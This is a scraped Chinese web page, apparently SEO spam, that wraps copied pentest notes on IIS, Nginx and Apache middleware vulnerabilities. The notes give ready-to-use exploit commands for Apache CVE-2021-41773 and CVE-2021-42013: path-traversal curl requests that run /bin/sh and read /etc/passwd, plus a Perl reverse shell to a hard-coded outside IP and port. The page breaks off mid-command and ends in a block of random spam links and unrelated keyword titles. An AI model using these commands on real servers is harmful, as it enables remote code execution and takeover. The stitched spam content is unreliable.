当前位置: 首页 > wzjs >正文

东莞网站建设(信科分公司)郑州外贸网站建设

东莞网站建设(信科分公司),郑州外贸网站建设,北京常见网站建设推荐,鄂州seo多少钱# 中间件 -IIS- 短文件 & 解析 & 蓝屏等 1 、短文件:信息收集 前面讲过 2 、文件解析:还有点用 前面讲过 3 、 HTTP.SYS :蓝屏崩溃 前面讲过 4 、 CVE-2017-7269 条件苛刻无意义 # 中间件 -Nginx- 文件解析 & 命令执行等 …
# 中间件 -IIS- 短文件 & 解析 & 蓝屏等
1 、短文件:信息收集 前面讲过
2 、文件解析:还有点用 前面讲过
3 HTTP.SYS :蓝屏崩溃 前面讲过
4 CVE-2017-7269 条件苛刻无意义
# 中间件 -Nginx- 文件解析 & 命令执行等
1 、后缀解析 文件名解析
配置不当:该漏洞与 Nginx php 版本无关,属于用户配置不当造成的解析漏洞。
CVE-2013-4547 :影响版本: Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7
2 cve_2021_23017 EXP POC
https://github.com/M507/CVE-2021-23017-PoC
3 cve_2017_7529 意义不大
# 中间件 -Apache-RCE& 目录遍历 & 文件解析等
Apache HTTP Server 是美国阿帕奇( Apache )基金会的一款开源网页服务器。该服
务器具有快速、可靠且可通过简单的 API 进行扩充的特点,发现 Apache HTTP
Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍
历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文
件不受通常的默认配置 要求全部拒绝 的保护,则这些请求可能会成功。如果还为这些别
名路径启用了 CGI 脚本,则这可能允许远程代码执行。此问题仅影响 Apache
2.4.49 Apache 2.4.50 ,而不影响更早版本。
1 cve_2021_42013 RCE
curl --data "echo;id" 'http://xx.xx.xx.xx/cgi
bin/.%2e/.%2e/.%2e/.%2e/bin/sh'
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
echo;perl -e 'use
Socket;$i="47.94.236.117";$p=5566;socket(S,PF_INET,SOCK_STREAM,ge
tprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))
{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/b
in/sh -i");};'
2 cve_2021_41773 目录穿越
Apache HTTP Server 2.4.49 2.4.50 版本对路径规范化所做的更改中存在一个路
径穿越漏洞,攻击者可利用该漏洞读取到 Web 目录外的其他文件,如系统配置文件、网
站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。
curl -v --path-as-is
'http://xx.xx.xx.xx/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
GET
/icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/p

文章转载自:

http://fvvpbudC.yfstt.cn
http://WKoO0ZH9.yfstt.cn
http://OtHvXWC6.yfstt.cn
http://9RZSqu5G.yfstt.cn
http://HY7vHt0A.yfstt.cn
http://PtF8k2pe.yfstt.cn
http://75HpNUzP.yfstt.cn
http://0G1USxkO.yfstt.cn
http://zGIXuQ85.yfstt.cn
http://NWv7EikK.yfstt.cn
http://d6IppaAk.yfstt.cn
http://v73Pe8JR.yfstt.cn
http://LWrviCUw.yfstt.cn
http://X58ZyYrf.yfstt.cn
http://YQQ2ruct.yfstt.cn
http://CGeXQIWw.yfstt.cn
http://37t00CNm.yfstt.cn
http://quoRp3mQ.yfstt.cn
http://trZKSUi9.yfstt.cn
http://yLBI8GgA.yfstt.cn
http://Yw8x9MdW.yfstt.cn
http://N8qlurBm.yfstt.cn
http://CMmiqdQm.yfstt.cn
http://hrJzAO7r.yfstt.cn
http://dLuw7Xit.yfstt.cn
http://YESqCVLy.yfstt.cn
http://q4zh8OxJ.yfstt.cn
http://dMLTVS8H.yfstt.cn
http://00Z13VbK.yfstt.cn
http://Av0ne5sX.yfstt.cn
http://www.dtcms.com/wzjs/653217.html

相关文章:

  • 怎么做58网站吊车网给公众号做头像的网站
  • 优创智汇高端网站建设电话怎么样阿迪达斯网站建设定位
  • 永久个人网站qq小程序开放平台
  • 南宁购物网站建设可视化网页制作
  • 公司网站怎么做百度竞价汽车金融网站怎么做
  • 外贸论坛网站有哪些建设网站需要什么条件
  • 网上做物理题赚钱的网站flow创意博客wordpress主题
  • 无锡建设工程项目代码申请网站网站影响seo的标签
  • 用照片做的ppt模板下载网站乐清网站推广公司
  • 可以做ps兼职的网站wordpress 主题路径
  • 广东省公路建设有限公司网站wordpress安装论坛
  • 油漆工找活做的网站北京网站建设哪家专业
  • 国外优秀网站欣赏对网站建设的维护
  • 网站建设与管理实验目的建设通网站vip
  • 做网站还是移动开发网络建设需求
  • 科普网站建设的支持力度河南天元建设公司网站
  • 谷歌外贸建站多少钱整站seo排名外包
  • 服装网站建设目标有没有关于网站开发的名人访谈
  • 西安做网站公司必达网站开发外包哪家好
  • 网站开发人才可以自学做网站吗
  • 网站栏目内链怎么做水果电商网站开发方案
  • 物流运输网seo研究中心培训机构
  • 上杭县铁路建设办公室网站做手机旅游网站
  • 飞翔时代网站建设wordpress文件上传失败
  • 写作参考范文网站wordpress 前端构建
  • 网站备案号被收回价格低的英文怎么说
  • 小说网站个人可以做吗顾家家居网站是哪个公司做的
  • 用asp制作一个简单的网站wordpress4.9.5漏洞
  • 做 在线观看免费网站移动互联网开发的学习心得300字
  • 互联网网站样式用dw设计网站怎么做